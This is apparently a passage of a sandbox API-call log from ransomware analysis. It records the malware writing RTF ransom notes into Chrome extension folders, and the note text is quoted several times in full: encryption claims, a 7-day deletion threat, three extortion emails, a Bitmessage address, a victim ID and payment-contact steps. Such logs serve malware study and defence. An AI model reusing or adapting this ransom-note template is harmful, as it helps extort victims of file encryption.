AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.570] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.570] CloseHandle (hObject=0x2c8) returned 1 [0278.571] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0278.571] GetLastError () returned 0x2 [0278.571] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.571] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.572] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.572] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be 